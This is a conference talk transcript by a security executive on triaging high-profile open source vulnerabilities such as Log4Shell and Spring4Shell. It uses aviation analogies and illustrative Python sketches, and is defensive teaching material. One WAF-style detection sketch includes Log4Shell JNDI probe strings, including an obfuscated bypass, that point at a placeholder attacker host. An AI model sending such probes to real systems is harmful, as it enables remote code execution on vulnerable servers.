Celebrity Vulnerabilities: Effective Response to Critical Production Threats

Summary

Alyssa Miller dives into the lessons learned from three major open source security events, the Equifax breach via Struts, the Log4j vulnerabilities and the Spring4Shell exploit.

Bio

Alyssa Miller is the Chief Information Security Officer (CISO) at Epiq Global. Her goal is to change how to look at the responsibility of information security within an organization to focus on enabling efficient development and reducing the friction of onerous security practices.

About the conference

Software is changing the world. QCon empowers software development by facilitating the spread of knowledge and innovation in the developer community. A practitioner-driven conference, QCon is designed for technical team leads, architects, engineering directors, and project managers who influence innovation in their teams.

Transcript

Miller: I'm Alyssa Miller. We're digging into celebrity vulnerabilities. I'm a hacker, a researcher, a cybersecurity author, and a cybersecurity executive. I'm also a pilot. Last year, I tackled something super exciting, a lifelong dream. I've always wanted to be a pilot, but it always seemed out of reach. Then the stars aligned last year, I started training. It took a few months, and then I ended up buying my own airplane. It took a few more months, then I finally passed my check ride, as they call it, which is how I earned my private pilot certificate. I'm officially a pilot. Being a pilot, and being an aircraft owner as well, I learned a lot about what the aviation community does, when it comes to handling a crisis. There's a lot of things obviously that can go wrong in aviation. I'm going to share some of them with you. We're going to talk about a little bit of what the FAA in the United States does, because that's what I'm most familiar with. A lot of these processes are similar with other agencies around the globe. I want to talk to you a little bit about this, because as I started to learn this, I realized there's some applicability here to how we handle cybersecurity incidents.

Aircraft Grounding Analogy to Celebrity Vulnerabilities

One aviation incident, we'll call it, or critical emergency you might be very familiar with, is this one here. This is the Boeing 737 MAX 8. I'm sure a lot of you heard in the news at some point about the issues with the Boeing 737 MAX 8. There were problems that led to a couple crashes that killed a lot of people. As a result, all 737 MAX 8 aircraft around the globe were grounded. They didn't know what was wrong. They knew there was a big problem on their hands, and they knew they had to fix it. They found out pretty quick what was causing it, but they really had to figure out how they were going to fix it. In the meantime, they grounded all of these planes. That ended up changing a lot of flight routes. It affected a lot of travelers when these airlines suddenly had fewer planes that they could fly. Some like Southwest Airlines in the United States were really heavily hit because 737s are all they fly. They had a lot of MAX 8 versions of the 737. They were able to recover. They have a lot of resources, a lot of aircraft in these various airlines. Overall, they were able to recover fairly easily.

What happens when it's not an airline being impacted? What happens when it's someone like me, who maybe only owns one aircraft? This aircraft here is not mine, but this is a Cirrus SR22. Very popular aircraft. Cirrus has been in the market for about 20 to 25 years, something like that. They've been making this aircraft. This aircraft is powered by this engine, a Continental IO-550. You don't need to know all that information, but understand that the way airplanes come together in the first place, it's not like cars. A lot of times you build a car, the same automaker that builds the body and builds the seats and does all that stuff, builds the engines and everything else. Airplanes aren't like that. Airplanes are a lot like how we build software. Different companies make different components and we plug all that together into an aircraft. Continental is a company that makes small aircraft engines. They make piston aircraft engines like this IO-550. Why am I talking about this? That IO-550 from Continental has an issue right now, and it's caused the grounding of a lot of planes. One of the ones in particular that's heavily hit is the SR22. Why is it grounded? Because they have an issue with a crankshaft counterweight. You don't even need to understand what that is either. Understand that because of this issue, they've had to ground a bunch of planes. People who only have one plane suddenly don't have an airplane to fly. I got to thinking, that sounds like how we approach when we have celebrity vulnerabilities. It's this all-hands-on-deck, we have to stop all of the development we're doing, no development work goes on, we have to fix these problems. That's all we can do. It's like the grounding of an aircraft.

Celebrity Vulnerabilities - Apache Struts

What do I mean by celebrity vulnerabilities? That's a term I borrowed from a coworker. When I'm talking about celebrity vulnerabilities, I'm talking about those big vulnerabilities, open source in most cases, that get all the press in the media, and that we have dealt with quite a bit in the last five to six years. One of the first ones that I can really remember was this vulnerability, CVE-2017-5638. It was a Struts vulnerability. When it came out, it was fairly critical. It had a high CVSS score, and everybody was worried about it. A lot of us rushed out and fixed it. Unfortunately, this company, Equifax, missed fixing some instances of it. As a result, they got breached. At the time, it was the biggest breach of consumer data in the history of recorded breaches. It all stemmed from this Struts vulnerability that had been well publicized, but didn't necessarily get fixed properly.

Log4j

A little closer to home, some of you might remember from the more recent past that, after these 164 million consumers were impacted, we had a new vulnerability show up. It was in this cool little package Java developers might remember, Log4j. How many of you use that? We had that cool vulnerability, Log4Shell. Everybody blew up. It was all the news, all the rage. Everybody was scrambling to fix it. We had CVE-2021-44228. Then we had CVE-2021-45046. Then we had CVE-2021-45105. All of these vulnerabilities started showing up related to Log4j. We started fixing when the first one was announced. Then we realized there was another vulnerability in that version, so we needed another new version of Log4j. Then they released another version of Log4j. The reality of all of this was, yes, 91% of Java apps in the world were impacted by this. If you're a Java developer, chances are you had to drop everything, you had to run out and reset all of the work you were doing and focus on fixing this vulnerability. What of course made it more complex was that not only were 91% of those Java apps impacted, 61% of those were impacted via some indirect dependency. It wasn't even a direct dependency that developers had included in their code. It was, I've got a dependency that also brings in Log4j with it. It wasn't always the easiest to discover. I got that data from my friends at Snyk, who released quite a bit of information regarding these particular vulnerabilities. That was 2021.

Spring4Shell

It wasn't too long after that we did the whole thing all over again, because we had this wonderful vulnerability that we named Spring4Shell. Now it's Spring, another super common package that a lot of people use in their code. We had one CVE, then two CVEs, then three CVEs again. We went through the same thing. As researchers found the first vulnerability, then they started digging deeper, they started finding more vulnerabilities. Before we knew it, we had three really high severity vulnerabilities in Spring that we had to deal with. Again, developers across the globe were called upon to stop everything they were doing, drop it all on the floor, and go to work trying to fix these vulnerabilities in all of their software. It's exhausting.

OpenSSL

Then, at the end of last year, OpenSSL showed up on the scene. Rumors started popping up, and the maintainers confirmed that a big announcement about a big vulnerability was coming, but there would be no information until five days later. What happened five days later? After everybody dropped everything, got all excited and all set to fix yet another celebrity vulnerability, they dropped the news of the vulnerability, and it just wasn't even that serious. Over time, we became conditioned by these multiple celebrity vulnerabilities to believe that we need to drop everything and rush out and fix it because there's going to be this critical vulnerability. As soon as attackers find out about it, they're going to come knocking at our door, they're going to be hacking our applications, and we need to fix it. Then we got slapped in the face by OpenSSL when it ended up being much ado about just a little bit. There's got to be a better way.

Avoiding 'All-Hands-On-Deck' Approach

Throughout these, I was right there with you. I've been working in cybersecurity the last 15 years, but I was on the other side of this. I was on the side of the cybersecurity folks who were like, this is really scary. I was also, in my experience, fighting for how can we not stir up the whole world and upend everybody's development pipelines, shut everything down, just to fix this? How can we be smarter? That's what I was fighting for in my organizations as these things were going down. When it comes to celebrity vulnerabilities like this, we have to work on avoiding that all-hands-on-deck approach, that drop all the things you're working on and come fix this, because it's not necessary. It's not efficient. It doesn't necessarily make us more secure. Ultimately, it conditions us for incorrect behaviors.

Let's talk about a real process. This process is based on my experience working with these vulnerabilities over the last number of years. I'm going to share with you what I learned, some of the things we were able to do in my organizations in order to address these in a more efficient fashion. When it comes to avoiding that all-hands-on-deck approach, there's three key factors we need to keep in mind. First is prioritization. We need to look at, truly, what is the most immediate attack surface? With Log4j initially, everybody was screaming, upgrade Log4j to the latest, you'd have to get the latest and greatest. As it turns out, if you weren't on a 2.x version, and actually a version higher than 2.8, you were not vulnerable to this JNDI vulnerability everybody was so worried about. First of all, we just have to understand the most immediate attack surface. Then we need to really establish some classifications for in-scope items, because we're going to use that then to lay out a roadmap for the actions that we are going to take. In the aviation community we have this saying that, in an emergency, first thing you should do is wind your watch. The point of that is, when you're presented with an emergency in aviation, we don't want you to instantly react and start flailing around trying to do all the things. We want you to stop, think methodically, and work through a checklist on how to address the situation to try to troubleshoot it, to try to resolve it, or then to respond in an emergency fashion. We need to do the same. That starts with prioritizing.

Next, we need to look at mitigations. Mitigations do a few things for us. They focus on delaying the attacks, not perfection. They need to be things that we quickly implement. We should be looking to layer them to complement those various mitigations, so that what we end up doing creates an overall decently secure situation while we then go and try to work on fixing the vulnerabilities in our code. Then, finally, we have to work on that remediation. How are we actually going to remediate the vulnerabilities in our code? We need to focus on, what is critical that has to be fixed right now. That goes back to our prioritization. Versus, what can we fix via business-as-usual processes, our normal vulnerability management program, perhaps? How do we leverage our backlogs to do that? How do we establish ongoing tracking to make sure that we do complete all the remediation in some specified timeline? Let's dig into this process a little bit more. Along the way, I'm going to help you see how some of those approaches in aviation can be a great guide for us.

Prioritize - Identify the Most Immediate Attack Surface

Let's start with identifying the most immediate attack surface. In aviation, when there's an emergency, one of the first places we can turn is this here. This is what we call the equipment list, or the minimum equipment list, or the standard equipment list. It gets a lot of different names. This is the equipment list for my airplane that you saw way back at the beginning. These are all the things that were installed in that aircraft the day it rolled off the assembly line. As things are added and removed, all of that has to be noted in logs. That means I constantly have an inventory of exactly what is in my airplane, so that if news comes out about a particular defect that needs to be addressed, I know exactly whether or not it applies to my aircraft. It's a wonderful thing. When it comes to software now, we understand that that's not always the easiest thing to do. I alluded to this before. In modern-day open source development, we have this idea of dependencies. Those dependencies can have their own dependencies, which can then have their own dependencies. I'm sure many of you are familiar with the idea of a dependency tree. It's those indirect dependencies that get us. That's what bit Equifax with that Struts vulnerability. They missed it because it was buried a few layers deep in the transitive dependencies of some open source package that they had included in their software. They didn't even know it was there. It got discovered by an attacker, and they got breached.

There's tools to help with this. Of course, typically, this is something that you'd love to see in your development pipeline. I talked about Snyk before, Black Duck, WhiteSource, ShiftLeft. These are all companies who make what we call software composition analysis, which is a tool that goes through your dependencies and discovers where you have open source dependencies, and alerts you when they're vulnerable. That's a great preparatory thing, but we're not talking about preparations here. We're talking about, what do you do when you find this in your environment, or there's a new celebrity vulnerability you need to figure out if it's in your environment? The good news is, in each of those cases, each of those celebrity vulnerabilities, starting with Log4j, each one of these tool vendors released detection tools as soon as they were able. In most cases, they could be accessed via their freemium product. You could download a free copy of Snyk for instance. You could connect it to your repo. You could let it run. It would go through your dependency tree, and it will tell you immediately if you had a Log4j dependency anywhere in that dependency tree. You can look to these tools to help you. What you're trying to do is understand, first of all, do you even have that dependency? Then, secondly, and these tools do this to varying degrees, is that vulnerability even reachable in your code? Because if it's in a particular function that you're not even using, and there's no way to access that particular object or something through the functionality of your application, then that's probably something you can prioritize further down.
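
A minimal sketch of the "do you even have that dependency?" check described above, assuming the dependency tree has already been exported into a simple mapping. The graph, the package names, and the `find_dependency_paths` helper are all hypothetical; real software composition analysis tools resolve this from build manifests and do far more.

```python
from typing import Dict, List

# Hypothetical dependency graph: package -> packages it depends on directly.
DEPENDENCY_GRAPH: Dict[str, List[str]] = {
    "my-app": ["web-framework", "report-lib"],
    "web-framework": ["http-client"],
    "report-lib": ["pdf-writer", "log4j-core"],
    "http-client": ["log4j-core"],
    "pdf-writer": [],
    "log4j-core": [],
}


def find_dependency_paths(graph: Dict[str, List[str]], root: str, target: str) -> List[List[str]]:
    """Return every path from root to target, walking the tree depth-first."""
    paths: List[List[str]] = []

    def walk(package: str, trail: List[str]) -> None:
        trail = trail + [package]
        if package == target:
            paths.append(trail)
            return
        for child in graph.get(package, []):
            if child not in trail:  # guard against dependency cycles
                walk(child, trail)

    walk(root, [])
    return paths


paths = find_dependency_paths(DEPENDENCY_GRAPH, "my-app", "log4j-core")
for path in paths:
    # Each printed line shows how the target package is pulled in.
    print(" -> ".join(path))
```

In this made-up graph the application never declares `log4j-core` itself; both paths reach it through another package, which is the indirect-dependency case that is hardest to spot by reading a manifest.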

Prioritize - Establish Classifications of In-Scope Items

That leads to our next facet of prioritization, which is establishing classifications of in-scope items. You need to understand what is in scope. In the aviation world, we release, and the FAA calls these Airworthiness Directives. There's different terms for them in different agencies. Ultimately, they're the same thing. It's a notice that says, this defect was discovered, and here's the aircraft that are affected or potentially affected. They list them by model number, by serial number, by manufacture date, all sorts of different criteria that tell you, this plane is involved, or it's not involved, so that you can look at it very quickly and know, does this apply to me or not? They then go into further in many of these Airworthiness Directives talking about, these are aircraft that are most critical and need to be addressed right away. These are aircraft that can wait until a later date, and so on. That's what we want to do with the software. We want to look at the software and say, here's the applications that we need to address right away. Here's ones that we're going to address second, or we might use some type of mitigating control, or whatever, and here's ones that are down the road a little bit later to be addressed.

How do we do this? We want to look at three key facets. We want to look at risk. We want to consider the risk. Our critical applications are probably ones that we want to prioritize higher. We might look at the user load, is it an application that's used by a lot of users, or is it something that's an internal utility app? What about monitoring capability? Those applications that we have no monitoring for, we're probably going to consider a little higher risk, because we can't watch them to see if there's unusual activity or something that's actively trying to exploit the vulnerability that's just been announced. Then we want to consider exploitability. Is it internet facing? If it's not, obviously, that's typically something where we can lower the risk picture of that, and it'll probably be in a later classification. What level of protected access does it have? Maybe it's something that's not available to the internet, but we do expose it to clients over certain connections. Those connections might be a way that attackers could find their way to that particular application. What other environmental aspects? How is it hosted? Where is it hosted? Is it hosted in a cloud? Is it a SaaS application? Do you have an on-prem data center that it's being hosted in? What security controls are in place? All of that is going to play into not only which classification does it go in as far as for remediation, but even, how do you remediate it, or how do you look at mitigating controls?

Then you want to look at just the ease of addressing it. Is it a current code base, or is it something that's out of date? We're looking here for those low-hanging fruit items. What can we knock out quickly? Maybe those are ones that we want to do first, because we can just knock them out, while we spend more time digging into ones where maybe it's more difficult. Is the upgrade that's needed going to be backward compatible? When we were looking at Log4j, if you were on 2.8 and you were trying to get to, I think 2.14 and then 2.15, there wasn't necessarily backward compatibility in all of the objects and all of the methods within those versions. That was problematic. Or, worse yet, if you had a 1.x version, it definitely wasn't backward compatible. You need to consider that as you're classifying your applications. Then, again, mitigations. Do you have some other way to mitigate the risk of that application in the short term? That can be a way that you also classify those applications.

Prioritize - Lay Out a Roadmap for Actions

Then you're going to use that prioritization to lay out a roadmap for your actions. In the aviation community, I talked about those Airworthiness Directives, or ADs as we call them. This is what happens in those. Remember, I was talking about that IO-550 engine that's in the SR22 and other aircraft? This is an excerpt from the Airworthiness Directive for that. You see, they very specifically lay out the steps for how you go about remediating. It's a plan. Each one of these steps gives you instructions based on what's discovered. As you get through this further, it tells you different things, not shown here, but as you discover different elements, what the required actions are. In some cases, you might have to remove the entire engine and have it rebuilt. In other cases, you don't have to do anything at all. Having that plan of action and understanding what you're going to do for each classification is important. What does that look like when we're talking about our applications? Those roadmaps can be one of two things. They could be sequential. It could be, we're going to implement this mitigation first. Then we're going to do this set of remediations. Then we're going to do another set of remediations. Or they might be things that you can do in parallel. It might be mitigations and remediations that are happening at the same time. Maybe somebody is working on network mitigation while your developers are starting to dig into the code and figure out how they are going to get to the next version of that package. Sometimes these intermix. You might be setting up some that are concurrent, and some that are sequential.

Laying out that roadmap is crucial, because this is part of having a plan. That's back to that wind your watch thing I mentioned, where we talk about in the aviation community: slow down, address it methodically. Look at the situation, understand what you're being faced with, and prioritize appropriately. Then lay out the plan for how you're going to get to remediation. That is the single biggest key. When we went through this with Log4j, I was the sole person in that room saying, we're not going to go in and send developers hog wild trying to fix every single bit of code. Let's stop, and let's talk about this, what are the aspects, or what are the characteristics of the applications that we need to fix first? Let's list out the mitigating controls that we can put in place, and let's lay out a plan for how we're going to address these.

Mitigate - Focus on Delaying Attacks, Not Perfection

Let's dig into mitigating controls. What are mitigating controls? First of all, mitigating controls are focused on delaying attacks. They are not about perfection. When I talk about the 737 MAX 8, the problem with that airplane ultimately, is this thing right here. It's what we call an angle of attack sensor. Basically, what this sensor tells you is, what is the aircraft's pitch relative to ultimately its forward motion. That's not 100% accurate. It basically says, if I'm flying level and straight, that's a low angle of attack. If I pitch up, now my angle of attack increases. If I pitch up and I also start to climb because of that pitch, that could actually decrease it a little bit, depending on speed and other things. It's about, what is my relative motion through the air? It's this angle of attack sensor that was the problem. If you know about the situation with the 737 MAX 8, you know what they didn't do was go and immediately start trying to fix these sensors. Instead, they created a software fix to address the hardware problem. Does this sound familiar to you developers, because I've been there?

What do we do in our space, when we're dealing with a vulnerability like one of these celebrity vulnerabilities? We want to look at what mitigations do we have. With Log4j, I was very fortunate that we had Akamai as our CDN. Along with it as a CDN, it also comes with a web application firewall. AWS has their WAF. Cloudflare has a web application firewall. What that did was that gave us an immediate ability to start to look for those incoming JNDI requests that were the problem. It was basically an exploit of that particular functionality within Log4j, so we could use our web application firewalls to do that. We also had endpoint protection. In my organization, it was CrowdStrike. You might also have Carbon Black, or you might be using Microsoft Defender for endpoints, or any other of the myriad of endpoint detection and response tools that are out there in the market. Again, there, it wasn't long after the vulnerability was announced that those makers were releasing detection rules that could find that and help block against attacks. It wasn't fixing the underlying software at all. It wasn't going into the code of the applications and fixing it, but we had these other layers that could at least help prevent some of those attacks. Of course, right away, people started to find ways to bypass the WAF rules and things like that, and it was a back and forth. Again, it's not about perfection. It's about delaying the attacks, while you take some time to actually fix the code and take care of that particular package that was vulnerable in your software.
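
A rough sketch of the kind of check such a rule performs, assuming request headers and parameters are available as a plain dictionary. The pattern and the `looks_like_jndi_probe` and `suspicious_fields` helpers are hypothetical and deliberately naive; they are not how any particular WAF or EDR product implements its detection.

```python
import re
from urllib.parse import unquote

# Naive pattern for the literal "${jndi:" lookup prefix, case-insensitive.
JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)


def looks_like_jndi_probe(value: str) -> bool:
    """Return True if the value contains a plain JNDI lookup after URL-decoding."""
    return bool(JNDI_PATTERN.search(unquote(value)))


def suspicious_fields(request_fields: dict) -> list:
    """Return the names of request fields (headers, params) that match the pattern."""
    return [name for name, value in request_fields.items()
            if looks_like_jndi_probe(value)]


# Hypothetical request data; attacker.example is a placeholder host.
fields = {
    "User-Agent": "${jndi:ldap://attacker.example/a}",
    "X-Api-Version": "%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fb%7D",
    "Accept": "text/html",
}
flagged = suspicious_fields(fields)

# A nested-lookup obfuscation slips past this naive pattern.
bypass_caught = looks_like_jndi_probe("${${lower:j}ndi:ldap://attacker.example/c}")
```

The last line is the point about perfection: the obfuscated string is not caught by this simple pattern, which is why rule sets kept being updated and why a second layer such as endpoint protection matters.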

Mitigate - Quickly Implemented to Reduce Risk

Mitigations, the next key is they need to be quickly implemented to reduce risk. With the Cirrus aircraft and that IO-550 from Continental, Cirrus came out right away and grounded all of their own aircraft and suggested anybody that was flying an affected aircraft do the same. That's a mitigating factor. It's something that can be done very quickly to make sure that people don't die. That's what it comes down to. In their case, grounding planes was a quick and easy mitigating control. Again, it doesn't fix the problem, but it delays the issue until the problem can be fixed. One thing that you can leverage here, if you haven't heard of it before, is the ModSecurity Core Rule Set from OWASP, the Open Web Application Security Project. Get familiar with them at owasp.org. The ModSecurity Core Rule Set is a set of web application firewall rules that are vendor agnostic. Many vendors' web application firewalls can use these general rules from the ModSecurity Core Rule Set to implement new detections and protections in their application firewalls. As you can see here, it was very quickly after the vulnerability in Log4j was announced that this rule set was updated with detections and protections for that Log4j vulnerability. It was continually updated as the multiple CVEs were being released, and new details were being found, new bypasses were being discovered. Again, they were updating it, trying to detect those bypasses and continue to protect us against attack. That's an easy way to implement web application firewall rules. They're going to keep you safer, again, while you work on other tactics to remediate the vulnerability in your environment.

Mitigate - Layer or Complement Mitigation Techniques

Then, finally, on the mitigation side, we need to remember that we want to look for ways to layer or complement these mitigation techniques, because they're not perfect. Where we know there's a weakness in one particular mitigation, we want to add in other mitigations to help. I talked before about those web application firewalls and those EDR tools, these endpoint detection and response tools. Those are two layers, so that even if attackers bypass the web application firewall, maybe that endpoint tool will see the attack and block it. What does that look like in the aviation community, when we talk about that 737 MAX 8? Take a look at this green column over here. This is everything they did to implement that software fix. Notice, it's not just one thing. They made adjustments to the MCAS. That's the software that we're talking about here. That software is ultimately what reads the input from the angle of attack sensor. It was getting erroneous data from that sensor and reacting in ways that weren't predictable. What did they do? They, first of all, made sure that it wouldn't just accept one input, it had to get input from multiple sensors. They then added a disagree light that said, something's going on here, I'm not getting the right information, one of these sensors is wrong. Rather than react and pitch the airplane down into the ground, which is what was happening, it instead did nothing and just said, the sensors are giving me two different messages. They also added a pilot override, because that was another problem: as these planes were pitching down into the ground, the pilots were unable to override the system easily. Then they focused on pilot training, because it was found that the pilots didn't know how to react in this situation.

What does that look like when we're talking about mitigations? When we're talking about mitigations, we want to block wherever possible. We can block the attack, or we can block access to certain functions. We want to do that. That is the key. That is our best mitigation, because that stops the attack. If we can't do that, we want to at least focus on isolation. How can we isolate those vulnerable apps? How can we keep them in their own environment, so at least if something happens, and they get breached, it doesn't become a launchpad for much greater scope of attack against our organization. We want to make sure we layer that in with the blocking. Then, finally, we want to log everything. Turn on all the logging you can in these moments, because your security people are going to be looking for what we call indications of compromise. They're going to be looking for those attacks or those attempted attacks. Turning on logging on your CDNs, on your WAFs, on your web servers, start looking through those access logs, turn up the logging capabilities, turn up the logging capability within your application itself. Then make sure you're feeding that somewhere. Or at least creating that data so your security team can come along and take care of digging through that to see if indeed someone's trying to attack you.

Remediate - Define Critical Remediation vs. Business-As-Usual

Now let's talk about remediation. Remediation is where we're really fixing the applications. We're going in and we're replacing those vulnerable libraries, or we're making some code fix, or doing whatever we need to. I say, we need to look first and foremost. This was a big sticking point for me when we were dealing with Log4j. It was, what do we have to fix right away, versus what can I log to my vulnerability management database? We just fix it in our normal course of addressing vulnerabilities. This is key. This is a core aspect to this because this is how you get out of the mode of fix it all, fix it all right now. We shut everything else down. Looking at the aviation community, now I'm going to talk about my plane. This is my airplane. This is a Piper PA-28. It's the Cherokee series of aircraft. There are a bunch of different models of this. What you see on the right is what we call a wing spar. That wing spar is what attaches the wing to the fuselage of the aircraft. You can see there, it's basically a steel I-beam sort of thing that runs through about maybe two-thirds of the wing and it has that little piece that sticks out, that gets bolted to the fuselage of the aircraft.

My aircraft, the PA-28, that type of aircraft has a problem where these things literally experience corrosion, and they experience fatigue cracking, and it can literally lead to the wings falling off. The FAA came out with guidance that specified what aircraft, based on what characteristics, were susceptible to this, and needed varying levels of investigation and repair. It was based in part on how many hours the plane had flown, but also what type of use the plane had seen, and some other factors. You had to calculate all this out. We want to be doing the same when it comes to our software. We want to use a risk matrix like this. Maybe you've seen this, this works great. We want to understand, what are the applications that have to get fixed right now? What are the ones that are running Log4j 2.8 or greater, they're internet accessible, and they're not behind a WAF, a web application firewall? Those are obviously the most critical, because we can't mitigate it. They've got the vulnerable versions, and they're open to the world. We've got to fix that first. If it's internal and it's running Log4j 2.5, which wasn't vulnerable to that particular attack (later, it was vulnerable to one of the other CVEs), maybe that's one we can decrease in risk and not have to remediate as quickly. That's laying out those remediation timelines. For those ones that are less critical, rather than make that the thing we're going to just fix as soon as possible, let's go back, maybe we have vulnerability management standards that say we've got 60 days to fix that. Let's log it as such and fix it using that process.
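
The decision described above can be sketched as a small function. Everything here is an assumption for illustration: the `App` fields, the tier names, and the deadline values are hypothetical (only the 60-day figure echoes the example in the talk), and the version threshold is the one quoted in the talk rather than an authoritative affected range, so check the advisory before relying on it.

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Tuple


@dataclass
class App:
    name: str
    log4j_version: Tuple[int, int]  # (major, minor), e.g. (2, 14)
    internet_facing: bool
    behind_waf: bool


# Hypothetical deadlines in days per tier; 60 mirrors the talk's example standard.
TIER_DEADLINE_DAYS = {"fix-now": 2, "fix-next": 14, "business-as-usual": 60}


def affected_by_jndi_issue(version: Tuple[int, int]) -> bool:
    # Threshold as quoted in the talk (2.x at 2.8 or above); confirm against the advisory.
    return version[0] == 2 and version >= (2, 8)


def remediation_tier(app: App) -> str:
    """Map an application onto a remediation tier."""
    if not affected_by_jndi_issue(app.log4j_version):
        return "business-as-usual"
    if app.internet_facing and not app.behind_waf:
        return "fix-now"   # vulnerable, exposed, and unmitigated
    return "fix-next"      # vulnerable, but internal or mitigated for now


def due_date(app: App, announced: date) -> date:
    """Deadline for the app, counted from the announcement date."""
    return announced + timedelta(days=TIER_DEADLINE_DAYS[remediation_tier(app)])


apps = [
    App("storefront", (2, 14), internet_facing=True, behind_waf=False),
    App("partner-api", (2, 14), internet_facing=True, behind_waf=True),
    App("batch-reports", (2, 5), internet_facing=False, behind_waf=False),
]
tiers = {app.name: remediation_tier(app) for app in apps}
```

Only the first application lands in the drop-everything tier; the other two get a dated entry in the normal process instead.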

Remediate - Leverage your Backlogs

To that end, that means, let's leverage our backlogs. Even if you don't have a vulnerability management program, for those apps that don't fall into that critical got to fix it right now category, log an issue on your backlog. Put it out there, make it a P1, P2, whatever fits for you, but put it on the backlog and fix it in your next release. Now it's just part of your normal process. An example of this with that wing spar situation, I mentioned the corrosion. First of all, when the FAA released it, it wasn't, ground your aircraft and look right now. It was, within the next 100 flight hours of the aircraft, you have to go and complete this, installing inspection panels and whatever. You can see it was 100 hours or 12 months, within 12 months. There, it's not a, you can't fly this plane until you do this inspection, and comply with this service directive, or this Airworthiness Directive. No, they gave you time, so that you could continue your normal work, and then just fix it. Aircraft have to undergo inspections every 12 months anyway. Maybe when you go in for your annual inspection, you could just take care of it then, business-as-usual. Yes, throw it in your backlog. Put it out there, fix it the way that you fix all your other security vulnerabilities. It's a high-risk severity, critical vulnerability that everybody is screaming about in the media. It's a celebrity vulnerability. Everybody says you got to fix it now. Let's be realistic about this. Let's look at where we can afford the time. Let's not scramble to fix everything at once. Let's fix the things that have to be fixed, put everything else in the backlog.
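As a rough sketch of what "put it on the backlog" can look like, the snippet below turns a finding into a backlog item with a due date. The priority labels, the window lengths in `REMEDIATION_WINDOW_DAYS`, and the `BacklogItem` shape are hypothetical; the 60-day figure simply echoes the example standard mentioned earlier in the talk.

```python
from dataclasses import dataclass
from datetime import date, timedelta

# Hypothetical remediation windows; take the real ones from your own standards.
REMEDIATION_WINDOW_DAYS = {"P1": 30, "P2": 60}


@dataclass(frozen=True)
class BacklogItem:
    app: str
    title: str
    priority: str
    due: date


def log_to_backlog(app: str, library: str, priority: str, found_on: date) -> BacklogItem:
    """Create a backlog entry whose due date follows the remediation window."""
    window = timedelta(days=REMEDIATION_WINDOW_DAYS[priority])
    return BacklogItem(app, f"Upgrade {library}", priority, found_on + window)
```

Calling `log_to_backlog("hr-tool", "log4j-core", "P2", date(2021, 12, 10))` yields an item due on 2022-02-08, which the team can then pick up in a normal release rather than in an emergency.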

Remediate - Establish Ongoing Tracking of Each Classification

Then we do need to track, ongoing, what are we going to do about this? Because you know as well as I do what happens in these cases: if you don't track these, they get forgotten about and they never get fixed. In the aviation world, remember I mentioned those annual inspections? This is what I keep. It's called a Squawk list. Every little thing that I notice is not right about my airplane, things that don't affect safety but are just a problem that I want to have addressed, I keep on a list. Then, for some of them, maybe when I take it in for an oil change, I have them look at it, or when I take it in for annual, I have them look at it. I keep a list, and you see here I note the resolutions when they've been achieved. For that last one in particular, you can see there it was inspected. I'm not ready to say that it's resolved, so I'm going to keep looking at it and keep inspecting it over time to make sure that it isn't a crack that I have to worry about.

We need to do the same thing with the software. We need to track each of the apps in each of those classifications and say, for those critical ones, the ones I said I have to fix right now, we're at 90%, we still have 10% to go. For the ones that we completely backlogged because they were low severity, we haven't touched 95% of them yet, and we've fixed only 5%, maybe because they were low-hanging fruit and easy to fix. Keeping that tracking going is how you make sure that you get through all of these. It's what's going to get your security team off your butt and stop them bugging you to fix it. Because you can say, "We're working on it. We've got this. They're logged. They're going to get fixed in this timeframe. We're on track. We're this far along." That's going to be really important. It makes sure that you don't get any surprises like we saw with Equifax.
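The kind of per-classification progress report described here can be sketched as follows. The input format, a list of `(classification, fixed)` pairs, is an assumption for illustration; in practice the data would come from your issue tracker or vulnerability management database.

```python
from collections import Counter
from typing import Dict, Iterable, Tuple


def progress_by_classification(apps: Iterable[Tuple[str, bool]]) -> Dict[str, int]:
    """Return the percentage of fixed apps for each classification."""
    total: Counter = Counter()
    fixed: Counter = Counter()
    for classification, is_fixed in apps:
        total[classification] += 1
        if is_fixed:
            fixed[classification] += 1
    # Every key in `total` has at least one app, so no division by zero.
    return {name: round(100 * fixed[name] / total[name]) for name in total}
```

With ten critical apps of which nine are fixed, and twenty backlogged apps of which one is fixed, this reports 90% for the critical group and 5% for the backlog, which is the status line you can hand to the security team.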

Review

Just to review, again, prioritize, mitigate, and then remediate. Slow down, fix it one step at a time in a methodical process. That is the key here. Avoid that all-hands-on-deck approach. Remember this quote from Winston Churchill, "Perfection is the enemy of progress." If we are so focused on completely eradicating a vulnerable package from our environment, we're going to get so wrapped around trying to be perfect, we'll never get anything fixed. We will fail to protect ourselves, and the chances of us getting breached go up.


Recorded at:

Sep 27, 2023

Alyssa Miller
